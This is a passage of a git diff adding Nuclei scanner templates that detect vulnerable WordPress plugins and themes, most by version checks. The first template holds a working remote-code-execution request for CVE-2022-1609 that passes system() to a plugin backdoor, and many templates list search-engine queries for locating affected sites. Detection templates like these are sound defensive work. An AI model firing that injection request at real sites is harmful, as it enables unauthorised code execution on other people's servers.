+ - https://wpscan.com/vulnerability/e2d546c9-85b6-47a4-b951-781b9ae5d0f2
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1609
+ - https://github.com/nastar-id/WP-school-management-RCE
+ - https://github.com/nomi-sec/PoC-in-GitHub
+ - https://github.com/0x007f/cve-2022-1609-exploit
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2022-1609
+ cwe-id: CWE-94
+ epss-score: 0.11941
+ epss-percentile: 0.95204
+ cpe: cpe:2.3:a:weblizar:school_management:*:*:*:*:pro:wordpress:*:*
+ metadata:
+ verified: false
+ max-request: 1
+ vendor: weblizar
+ product: school_management
+ framework: wordpress
+ tags: cve,cve2022,rce,wp,backdoor,wpscan,wordpress
+variables:
+ cmd: "echo CVE-2022-1609 | rev"
+
+http:
+ - raw:
+ - |
+ POST /wp-json/am-member/license HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ blowfish=1&blowf=system('{{cmd}}');
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '9061-2202-EVC'
+# digest: 4a0a0047304502200872372405ed22355feb5563998d7f95436c514c160cfeccf01a8b2abd46b860022100be3d47033c621fc7e1bb884a38a475d6cea39dca8c02c8eddbc4cbcaeb933025:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/cve/CVE-2023-2416-b6e308449e56a72318f3547f11c5f544.yaml b/poc/cve/CVE-2023-2416-b6e308449e56a72318f3547f11c5f544.yaml
new file mode 100644
index 0000000000..5d9f66f32e
--- /dev/null
+++ b/poc/cve/CVE-2023-2416-b6e308449e56a72318f3547f11c5f544.yaml
@@ -0,0 +1,59 @@
+id: CVE-2023-2416-b6e308449e56a72318f3547f11c5f544
+
+info:
+ name: >
+ Online Booking & Scheduling Calendar for WordPress by vcita <= 4.5 - Cross-Site Request Forgery to Account Logout
+ author: topscoder
+ severity: medium
+ description: >
+ The Online Booking & Scheduling Calendar for WordPress by vcita plugin for WordPress is vulnerable to Cross-Site Request Forgery due to a missing nonce check on the vcita_logout_callback function in versions up to, and including, 4.5. This makes it possible for unauthenticated to logout a vctia connected account which would cause a denial of service on the appointment scheduler, via a forged request granted they can trick a site user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/f434585c-8533-4788-b0bc-5650390c29a8?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L
+ cvss-score: 5.4
+ cve-id: CVE-2023-2416
+ metadata:
+ fofa-query: "wp-content/plugins/meeting-scheduler-by-vcita/"
+ google-query: inurl:"/wp-content/plugins/meeting-scheduler-by-vcita/"
+ shodan-query: 'vuln:CVE-2023-2416'
+ tags: cve,wordpress,wp-plugin,meeting-scheduler-by-vcita,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/meeting-scheduler-by-vcita/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "meeting-scheduler-by-vcita"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 4.5')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-0680-0ba13fa9274659992e0f27178c53ade5.yaml b/poc/cve/CVE-2024-0680-0ba13fa9274659992e0f27178c53ade5.yaml
new file mode 100644
index 0000000000..3e70868ca5
--- /dev/null
+++ b/poc/cve/CVE-2024-0680-0ba13fa9274659992e0f27178c53ade5.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-0680-0ba13fa9274659992e0f27178c53ade5
+
+info:
+ name: >
+ WP Private Content Plus <= 3.6 - Protection Mechanism Bypass
+ author: topscoder
+ severity: medium
+ description: >
+ The WP Private Content Plus plugin for WordPress is vulnerable to information disclosure in all versions up to, and including, 3.6. This is due to the plugin not properly restricting access to posts via the REST API when a page has been made private. This makes it possible for unauthenticated attackers to view protected posts.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/43d8904f-3bc9-4c67-b44b-8d78762b6b30?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2024-0680
+ metadata:
+ fofa-query: "wp-content/plugins/wp-private-content-plus/"
+ google-query: inurl:"/wp-content/plugins/wp-private-content-plus/"
+ shodan-query: 'vuln:CVE-2024-0680'
+ tags: cve,wordpress,wp-plugin,wp-private-content-plus,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-private-content-plus/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-private-content-plus"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.6')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-10056.yaml b/poc/cve/CVE-2024-10056.yaml
new file mode 100644
index 0000000000..f494085d76
--- /dev/null
+++ b/poc/cve/CVE-2024-10056.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-10056
+
+info:
+ name: >
+ Contact Form Builder <= 4.10.4 - Authenticated (Contributor+) Stored Cross-Site Scripting via livesite-pay Shortcode
+ author: topscoder
+ severity: low
+ description: >
+ The Contact Form Builder by vcita plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's livesite-pay shortcode in all versions up to, and including, 4.10.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/5d1b419c-2276-415d-8c54-15da9125c442?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-10056
+ metadata:
+ fofa-query: "wp-content/plugins/contact-form-with-a-meeting-scheduler-by-vcita/"
+ google-query: inurl:"/wp-content/plugins/contact-form-with-a-meeting-scheduler-by-vcita/"
+ shodan-query: 'vuln:CVE-2024-10056'
+ tags: cve,wordpress,wp-plugin,contact-form-with-a-meeting-scheduler-by-vcita,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/contact-form-with-a-meeting-scheduler-by-vcita/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "contact-form-with-a-meeting-scheduler-by-vcita"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 4.10.4')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-10178.yaml b/poc/cve/CVE-2024-10178.yaml
new file mode 100644
index 0000000000..ee98d1b80a
--- /dev/null
+++ b/poc/cve/CVE-2024-10178.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-10178
+
+info:
+ name: >
+ Gutentor – Gutenberg Blocks – Page Builder for Gutenberg Editor <= 3.3.9 - Authenticated (Contributor+) Stored Cross-Site Scripting via Countdown Widget
+ author: topscoder
+ severity: low
+ description: >
+ The Gutentor – Gutenberg Blocks – Page Builder for Gutenberg Editor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Countdown widget in all versions up to, and including, 3.3.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/17ecebfd-b07f-415f-892f-e069ab84031a?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-10178
+ metadata:
+ fofa-query: "wp-content/plugins/gutentor/"
+ google-query: inurl:"/wp-content/plugins/gutentor/"
+ shodan-query: 'vuln:CVE-2024-10178'
+ tags: cve,wordpress,wp-plugin,gutentor,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/gutentor/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "gutentor"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.3.9')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-10247-7e9248f7d08a8c804a85ce87492c023b.yaml b/poc/cve/CVE-2024-10247-7e9248f7d08a8c804a85ce87492c023b.yaml
new file mode 100644
index 0000000000..ff987679f5
--- /dev/null
+++ b/poc/cve/CVE-2024-10247-7e9248f7d08a8c804a85ce87492c023b.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-10247-7e9248f7d08a8c804a85ce87492c023b
+
+info:
+ name: >
+ YouTube Gallery and Vimeo Gallery Plugin <= 2.4.2 - Authenticated (Administrator+) SQL Injection
+ author: topscoder
+ severity: low
+ description: >
+ The Video Gallery – Best WordPress YouTube Gallery Plugin plugin for WordPress is vulnerable to time-based SQL Injection via the orderby parameter in all versions up to, and including, 2.4.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/f5524582-5aac-48b4-ad67-7c4829d63ed0?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 7.2
+ cve-id: CVE-2024-10247
+ metadata:
+ fofa-query: "wp-content/plugins/gallery-videos/"
+ google-query: inurl:"/wp-content/plugins/gallery-videos/"
+ shodan-query: 'vuln:CVE-2024-10247'
+ tags: cve,wordpress,wp-plugin,gallery-videos,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/gallery-videos/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "gallery-videos"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.4.2')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-10320-f49b48a1fa24c03d49f1d0779bc05074.yaml b/poc/cve/CVE-2024-10320-f49b48a1fa24c03d49f1d0779bc05074.yaml
new file mode 100644
index 0000000000..a72c85cd6b
--- /dev/null
+++ b/poc/cve/CVE-2024-10320-f49b48a1fa24c03d49f1d0779bc05074.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-10320-f49b48a1fa24c03d49f1d0779bc05074
+
+info:
+ name: >
+ Cookielay <= 1.2.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via cookielay Shortcode
+ author: topscoder
+ severity: low
+ description: >
+ The Cookielay plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's cookielay shortcode in all versions up to, and including, 1.2.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/8e014aa5-4fdf-458b-a975-e3ced7186dc2?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-10320
+ metadata:
+ fofa-query: "wp-content/plugins/cookielay/"
+ google-query: inurl:"/wp-content/plugins/cookielay/"
+ shodan-query: 'vuln:CVE-2024-10320'
+ tags: cve,wordpress,wp-plugin,cookielay,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/cookielay/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "cookielay"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2.0')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-10516-90da3b799283fae5783fef07a67bdeef.yaml b/poc/cve/CVE-2024-10516-90da3b799283fae5783fef07a67bdeef.yaml
new file mode 100644
index 0000000000..30a8c6df13
--- /dev/null
+++ b/poc/cve/CVE-2024-10516-90da3b799283fae5783fef07a67bdeef.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-10516-90da3b799283fae5783fef07a67bdeef
+
+info:
+ name: >
+ Swift Performance Lite <= 2.3.7.1 - Unauthenticated Local PHP File Inclusion via 'ajaxify'
+ author: topscoder
+ severity: critical
+ description: >
+ The Swift Performance Lite plugin for WordPress is vulnerable to Local PHP File Inclusion in all versions up to, and including, 2.3.7.1 via the 'ajaxify' function. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/4921f41a-a9b1-4ae2-a903-c14ed22dcc15?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.1
+ cve-id: CVE-2024-10516
+ metadata:
+ fofa-query: "wp-content/plugins/swift-performance-lite/"
+ google-query: inurl:"/wp-content/plugins/swift-performance-lite/"
+ shodan-query: 'vuln:CVE-2024-10516'
+ tags: cve,wordpress,wp-plugin,swift-performance-lite,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/swift-performance-lite/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "swift-performance-lite"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.3.7.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-10578-6bc0121b7a6d48f214b8939cb1f78d29.yaml b/poc/cve/CVE-2024-10578-6bc0121b7a6d48f214b8939cb1f78d29.yaml
new file mode 100644
index 0000000000..1491e63422
--- /dev/null
+++ b/poc/cve/CVE-2024-10578-6bc0121b7a6d48f214b8939cb1f78d29.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-10578-6bc0121b7a6d48f214b8939cb1f78d29
+
+info:
+ name: >
+ Pubnews <= 1.0.7 - Unauthenticated Arbitrary Plugin Installation
+ author: topscoder
+ severity: low
+ description: >
+ The Pubnews theme for WordPress is vulnerable to unauthorized arbitrary plugin installation due to a missing capability check on the pubnews_importer_plugin_action_for_notice() function in all versions up to, and including, 1.0.7. This makes it possible for authenticated attackers, with Subscriber-level access and above, to install arbitrary plugins that can be leveraged to exploit other vulnerabilities.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/7eaa0117-5320-431f-b3d2-05a867901528?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2024-10578
+ metadata:
+ fofa-query: "wp-content/themes/pubnews/"
+ google-query: inurl:"/wp-content/themes/pubnews/"
+ shodan-query: 'vuln:CVE-2024-10578'
+ tags: cve,wordpress,wp-theme,pubnews,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/themes/pubnews/style.css"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "pubnews"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.7')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-10681-074ccd2e143d120107ec916d21cfe73a.yaml b/poc/cve/CVE-2024-10681-074ccd2e143d120107ec916d21cfe73a.yaml
new file mode 100644
index 0000000000..5c42b94e4a
--- /dev/null
+++ b/poc/cve/CVE-2024-10681-074ccd2e143d120107ec916d21cfe73a.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-10681-074ccd2e143d120107ec916d21cfe73a
+
+info:
+ name: >
+ ARMember – Membership Plugin, Content Restriction, Member Levels, User Profile & User signup <= 4.0.51 - Authenticated (Subscriber+) Arbitrary Shortcode Execution
+ author: topscoder
+ severity: low
+ description: >
+ The The ARMember – Membership Plugin, Content Restriction, Member Levels, User Profile & User signup plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 4.0.51. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for authenticated attackers, with subscriber-level access and above, to execute arbitrary shortcodes.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/ee0eead2-3eab-4a2a-bfe4-c0d8f91dc0a5?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
+ cvss-score: 6.3
+ cve-id: CVE-2024-10681
+ metadata:
+ fofa-query: "wp-content/plugins/armember-membership/"
+ google-query: inurl:"/wp-content/plugins/armember-membership/"
+ shodan-query: 'vuln:CVE-2024-10681'
+ tags: cve,wordpress,wp-plugin,armember-membership,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/armember-membership/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "armember-membership"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 4.0.51')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-10689-ec644bcff6b8252f58e7ce0b4795467c.yaml b/poc/cve/CVE-2024-10689-ec644bcff6b8252f58e7ce0b4795467c.yaml
new file mode 100644
index 0000000000..4c56e5a5b1
--- /dev/null
+++ b/poc/cve/CVE-2024-10689-ec644bcff6b8252f58e7ce0b4795467c.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-10689-ec644bcff6b8252f58e7ce0b4795467c
+
+info:
+ name: >
+ XLTab – Accordions and Tabs for Elementor Page Builder <= 1.4 - Authenticated (Contributor+) Post Disclosure
+ author: topscoder
+ severity: low
+ description: >
+ The XLTab – Accordions and Tabs for Elementor Page Builder plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.4 via the 'XLTAB_INSERT_TPL' shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private or draft posts created by Elementor that they should not have access to.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/dbf8c216-aedd-4db9-aaa4-61bc0d7850cb?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-10689
+ metadata:
+ fofa-query: "wp-content/plugins/xl-tab/"
+ google-query: inurl:"/wp-content/plugins/xl-tab/"
+ shodan-query: 'vuln:CVE-2024-10689'
+ tags: cve,wordpress,wp-plugin,xl-tab,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/xl-tab/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "xl-tab"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.4')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-10692-c75c741c420e4c515c59f2646be4e222.yaml b/poc/cve/CVE-2024-10692-c75c741c420e4c515c59f2646be4e222.yaml
new file mode 100644
index 0000000000..48ca65f1e2
--- /dev/null
+++ b/poc/cve/CVE-2024-10692-c75c741c420e4c515c59f2646be4e222.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-10692-c75c741c420e4c515c59f2646be4e222
+
+info:
+ name: >
+ PowerPack Elementor Addons (Free Widgets, Extensions and Templates) <= 2.8.1 - Authenticated (Contributor+) Post Disclosure
+ author: topscoder
+ severity: low
+ description: >
+ The PowerPack Elementor Addons (Free Widgets, Extensions and Templates) plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 2.8.1 via the Content Reveal widget due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from password protected, private, or draft posts that they should not have access to.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/d073d9df-0636-4884-b5d0-e2da779e5edf?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-10692
+ metadata:
+ fofa-query: "wp-content/plugins/powerpack-lite-for-elementor/"
+ google-query: inurl:"/wp-content/plugins/powerpack-lite-for-elementor/"
+ shodan-query: 'vuln:CVE-2024-10692'
+ tags: cve,wordpress,wp-plugin,powerpack-lite-for-elementor,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/powerpack-lite-for-elementor/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "powerpack-lite-for-elementor"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.8.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-10777.yaml b/poc/cve/CVE-2024-10777.yaml
new file mode 100644
index 0000000000..257b0a607b
--- /dev/null
+++ b/poc/cve/CVE-2024-10777.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-10777
+
+info:
+ name: >
+ AnyWhere Elementor <= 1.2.11 - Authenticated (Contributor+) Post Disclosure
+ author: topscoder
+ severity: low
+ description: >
+ The AnyWhere Elementor plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.2.11 via the 'INSERT_ELEMENTOR' shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private or draft posts created by Elementor that they should not have access to.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/c2138634-c149-4fd1-a33d-351bbf633ea3?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-10777
+ metadata:
+ fofa-query: "wp-content/plugins/anywhere-elementor/"
+ google-query: inurl:"/wp-content/plugins/anywhere-elementor/"
+ shodan-query: 'vuln:CVE-2024-10777'
+ tags: cve,wordpress,wp-plugin,anywhere-elementor,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/anywhere-elementor/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "anywhere-elementor"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2.11')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-10836-e5372e893ae8325e3b297cc93a19837f.yaml b/poc/cve/CVE-2024-10836-e5372e893ae8325e3b297cc93a19837f.yaml
new file mode 100644
index 0000000000..0e3961dc66
--- /dev/null
+++ b/poc/cve/CVE-2024-10836-e5372e893ae8325e3b297cc93a19837f.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-10836-e5372e893ae8325e3b297cc93a19837f
+
+info:
+ name: >
+ Flixita <= 1.0.82 - Reflected Cross-Site Scripting via id Parameter
+ author: topscoder
+ severity: medium
+ description: >
+ The Flixita theme for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘id’ parameter in all versions up to, and including, 1.0.82 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/131b5d57-2af1-4cc5-8b4e-019a050c3bb8?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-10836
+ metadata:
+ fofa-query: "wp-content/themes/flixita/"
+ google-query: inurl:"/wp-content/themes/flixita/"
+ shodan-query: 'vuln:CVE-2024-10836'
+ tags: cve,wordpress,wp-theme,flixita,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/themes/flixita/style.css"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "flixita"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.82')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-10848.yaml b/poc/cve/CVE-2024-10848.yaml
new file mode 100644
index 0000000000..928bde3531
--- /dev/null
+++ b/poc/cve/CVE-2024-10848.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-10848
+
+info:
+ name: >
